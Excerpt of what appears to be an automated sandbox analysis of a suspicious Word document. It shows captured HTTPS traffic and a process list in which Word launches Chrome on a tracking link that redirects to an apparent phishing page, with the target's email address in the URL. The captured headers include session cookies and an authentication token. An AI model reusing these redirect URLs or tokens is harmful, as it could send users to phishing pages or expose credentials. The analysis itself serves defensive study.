                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:30:01 UTC11197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          139192.168.2.175000913.107.5.88443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:30:01 UTC537OUTGET /ab HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: evoke-windowsservices-tas.msedge.net
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                                                          X-PHOTOS-CALLERID: 9NMPJ99VJBWV
                                                                                                                                                                                                                                                                                                                                                                          X-EVOKE-RING:
                                                                                                                                                                                                                                                                                                                                                                          X-WINNEXT-RING: Public
                                                                                                                                                                                                                                                                                                                                                                          X-WINNEXT-TELEMETRYLEVEL: Basic
                                                                                                                                                                                                                                                                                                                                                                          X-WINNEXT-OSVERSION: 10.0.19045.0
                                                                                                                                                                                                                                                                                                                                                                          X-WINNEXT-APPVERSION: 1.23082.131.0
                                                                                                                                                                                                                                                                                                                                                                          X-WINNEXT-PLATFORM: Desktop
                                                                                                                                                                                                                                                                                                                                                                          X-WINNEXT-CANTAILOR: False
                                                                                                                                                                                                                                                                                                                                                                          X-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}
                                                                                                                                                                                                                                                                                                                                                                          X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=
                                                                                                                                                                                                                                                                                                                                                                          If-None-Match: 2056388360_-1434155563
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:30:01 UTC209INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                                                                                                                                          X-MSEdge-Ref: Ref A: 144BC94630B045E38A846589DD77155F Ref B: DFW311000103053 Ref C: 2024-11-13T16:30:01Z
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:30:01 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          140192.168.2.17500102.23.209.157443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:30:02 UTC2585OUTGET /client/config?cc=CH&setlang=en-CH HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          X-Search-CortanaAvailableCapabilities: None
                                                                                                                                                                                                                                                                                                                                                                          X-Search-SafeSearch: Moderate
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                                          X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                                                                                                                                                                                                                                                                                          X-UserAgeClass: Unknown
                                                                                                                                                                                                                                                                                                                                                                          X-BM-Market: CH
                                                                                                                                                                                                                                                                                                                                                                          X-BM-DateFormat: dd/MM/yyyy
                                                                                                                                                                                                                                                                                                                                                                          X-Device-OSSKU: 48
                                                                                                                                                                                                                                                                                                                                                                          X-BM-DTZ: -300
                                                                                                                                                                                                                                                                                                                                                                          X-DeviceID: 01000A41090080B6
                                                                                                                                                                                                                                                                                                                                                                          X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                                                                                                                                                                                                                                                                                                                          X-Search-TimeZone: Bias=300; StandardBias=0; TimeZoneKeyName=Eastern Standard Time
                                                                                                                                                                                                                                                                                                                                                                          X-BM-Theme: 000000;0078d7
                                                                                                                                                                                                                                                                                                                                                                          X-Search-RPSToken: t%3DEwDoAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAZ9wFy4prAXDotaSkjc8ffAiUyEj64CQlxVeaR9qcW7MT11UX1XM//U6xk7zg85MnS/VYq12XqBiLIJS04X13LOtiX5o9CvJS/eIGVIMh2Dx27rTmSLkvIDyfYlXAGfUSYLpzb3N81Sp7msx7v1gOwbzvZE4v85HuSmeUUled9wIRwjU2G8Xz4GXdiGe9yt8n5WAncovn/pkUEcDePMQ4g%2BC857zTgEEwMYQjfjWE1TrSsYzA%2B/cviLxh8uEHO/mvkNehdUvmW43r9456sgNjkS4ktSjywc7Lx5G9/QsSUky1RzdipdNtjuLML8n6WEW3AWXnE%2B6wNYTpHWPWpqa8ywQZgAAEPJnAZc3PSJ//mrFg6dnTMywAUKR1cLcuvv1Q/RHF/B25hy3ktknCm9NUsR1AhtEf7eoU196JGOJJg40Wam%2BxZpmt0GG5ibLf/nD3s1f5CCQsbU4l2DdHTJF89GkL4T3%2BCNzNTQlIqml7BSNDJocd4plQGCE8CQfBbjCO8E67Q%2BtZK4O2DatdgGac6P6/BLDr03XnfW0jZ8WnMD0H2Rn5hOEcJuA%2B%2B%2BWUr1K/eFt5XRU%2BfEXG8TB6UD1wFXW4Cn4rBJ0GI2WyRsnTwCaKjIWIgq7RYjCm7/N%2BttB2I/gwVbx9i4fpAYYRseMv/ZBenN37hX74CgM4qHctFZXgrbTJVgpSpeXCtgYmNCkJW3Kpb3dM3Ph9EW9ndW4Z7yMFsVK5dIVEJ5T%2BJO3PWgNdp9scL28L2dozVqWNivlAvGycP/cHK3R6B6PcQPZdB%2BEvGt6xIEcM8443YBFSAC77Q7DHQ9NmXWyLeG0cZAw%2BACmjP90mTy2eGNTtAUcksViqbEcoaM16L9YQgRcL7CHu%2B4qH3DGKJPqGRIbsgm7VNwtMGad4xcfk8umpW9EvHSYIDMKth4c6e8 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                          X-Agent-DeviceId: 01000A41090080B6
                                                                                                                                                                                                                                                                                                                                                                          X-BM-CBT: 1731515398
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                                                                                                                          X-Device-isOptin: false
                                                                                                                                                                                                                                                                                                                                                                          Accept-language: en-GB, en, en-US
                                                                                                                                                                                                                                                                                                                                                                          X-Device-Touch: false
                                                                                                                                                                                                                                                                                                                                                                          X-Device-ClientSession: 7F9AC86BFC3645F1AA7A60F77D753DAB
                                                                                                                                                                                                                                                                                                                                                                          X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                                                                                                                                                                                                                                                                          Host: www.bing.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Cookie: SRCHUID=V=2&GUID=C4EAB6C130004333A34B5668AE4E4D10&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=en; MUID=4590362BB5CF472B95BBEDB3112D4B7B; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:30:02 UTC1147INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 2215
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                          X-EventID: 6734d40aa6e547daba120b1a00a2281f
                                                                                                                                                                                                                                                                                                                                                                          X-AS-SetSessionMarket: de-ch
                                                                                                                                                                                                                                                                                                                                                                          UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:30:02 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: _EDGE_S=SID=30653EC6C710668A0D062BF0C6D8679F&mkt=de-ch; domain=.bing.com; path=/; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: ANON=A=84BEA1DAAAB85FA790252CDAFFFFFFFF; domain=.bing.com; expires=Mon, 08-Dec-2025 16:30:02 GMT; path=/; secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: WLS=C=0000000000000000&N=; domain=.bing.com; path=/; secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: _SS=SID=30653EC6C710668A0D062BF0C6D8679F; domain=.bing.com; path=/; secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=93600
                                                                                                                                                                                                                                                                                                                                                                          X-CDN-TraceID: 0.29d01702.1731515402.2b52626
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:30:02 UTC2215INData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 31 2c 22 63 6f 6e 66 69 67 22 3a 7b 22 46 65 61 74 75 72 65 43 6f 6e 66 69 67 22 3a 7b 22 53 65 61 72 63 68 42 6f 78 49 62 65 61 6d 50 6f 69 6e 74 65 72 4f 6e 48 6f 76 65 72 22 3a 7b 22 76 61 6c 75 65 22 3a 74 72 75 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 68 6f 77 53 65 61 72 63 68 47 6c 79 70 68 4c 65 66 74 4f 66 53 65 61 72 63 68 42 6f 78 22 3a 7b 22 76 61 6c 75 65 22 3a 74 72 75 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 65 61 72 63 68 42 6f 78 55 73 65 53 65 61 72 63 68 49 63 6f 6e 41 74 52 65 73 74 22 3a 7b 22 76 61 6c 75 65 22 3a 66 61 6c 73 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 65 61 72 63 68 42 75 74 74 6f 6e 55 73 65 53 65 61 72 63 68 49 63 6f 6e 22 3a 7b 22 76 61 6c 75 65
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: {"version":1,"config":{"FeatureConfig":{"SearchBoxIbeamPointerOnHover":{"value":true,"feature":""},"ShowSearchGlyphLeftOfSearchBox":{"value":true,"feature":""},"SearchBoxUseSearchIconAtRest":{"value":false,"feature":""},"SearchButtonUseSearchIcon":{"value


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          141192.168.2.175001634.251.101.1624436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:30:17 UTC669OUTPOST /mon HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 1868
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cg_uuid=a7672655cc19ce211243958c37046200
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:30:17 UTC1868OUTData Raw: 65 3d 33 37 64 66 62 64 38 65 65 38 34 65 30 30 31 32 36 39 65 66 63 32 33 34 65 66 34 34 38 66 39 38 39 32 32 35 63 32 34 66 35 36 37 64 34 33 64 36 64 61 31 39 30 38 62 65 36 32 34 35 63 61 64 37 62 64 37 30 61 39 37 36 37 31 30 63 65 36 30 65 64 38 39 33 37 33 62 66 65 37 30 65 39 63 32 30 63 31 65 35 33 65 38 64 35 39 31 33 38 34 36 62 32 30 31 37 30 37 31 61 31 30 61 63 66 39 66 32 39 66 36 37 31 38 38 35 38 35 38 65 30 35 32 61 33 61 31 65 61 64 32 62 37 36 30 64 64 34 36 65 64 64 36 33 63 36 30 36 33 34 30 36 32 61 39 36 35 61 35 33 35 63 33 32 30 34 35 62 63 30 62 63 36 62 34 66 37 37 62 65 32 36 62 62 32 35 63 62 34 33 65 32 39 32 33 63 66 33 34 63 36 64 61 39 30 39 33 33 37 38 31 34 64 61 34 64 65 34 34 34 65 63 38 62 63 35 39 61 37 65 65 34 36
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: e=37dfbd8ee84e001269efc234ef448f989225c24f567d43d6da1908be6245cad7bd70a976710ce60ed89373bfe70e9c20c1e53e8d5913846b2017071a10acf9f29f671885858e052a3a1ead2b760dd46edd63c60634062a965a535c32045bc0bc6b4f77be26bb25cb43e2923cf34c6da909337814da4de444ec8bc59a7ee46
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:30:17 UTC277INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:30:17 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          142192.168.2.175001734.251.101.1624436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:30:18 UTC403OUTGET /mon HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cg_uuid=a7672655cc19ce211243958c37046200
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:30:18 UTC268INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: undefined
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:30:18 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                                                                                                                                          Start time:11:28:49
                                                                                                                                                                                                                                                                                                                                                                          Start date:13/11/2024
                                                                                                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\Pmendon.ext_Reord_Adjustment.docx" /o ""
                                                                                                                                                                                                                                                                                                                                                                          Imagebase:0xcb0000
                                                                                                                                                                                                                                                                                                                                                                          File size:1'620'872 bytes
                                                                                                                                                                                                                                                                                                                                                                          MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                                                                                                                                                          Start time:11:28:54
                                                                                                                                                                                                                                                                                                                                                                          Start date:13/11/2024
                                                                                                                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Pmendon.ext+goeasy.com
                                                                                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7d6f10000
                                                                                                                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                                                          MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                                                                                                                                                          Start time:11:28:55
                                                                                                                                                                                                                                                                                                                                                                          Start date:13/11/2024
                                                                                                                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=1976,i,12167023317948266424,17469008393303426487,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7d6f10000
                                                                                                                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                                                          MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                                                                                                                                                                                          Start time:11:29:15
                                                                                                                                                                                                                                                                                                                                                                          Start date:13/11/2024
                                                                                                                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5672 --field-trial-handle=1976,i,12167023317948266424,17469008393303426487,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7d6f10000
                                                                                                                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                                                          MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                                                                                                                                                          Start time:11:29:15
                                                                                                                                                                                                                                                                                                                                                                          Start date:13/11/2024
                                                                                                                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5632 --field-trial-handle=1976,i,12167023317948266424,17469008393303426487,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7d6f10000
                                                                                                                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                                                          MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                                                                          No disassembly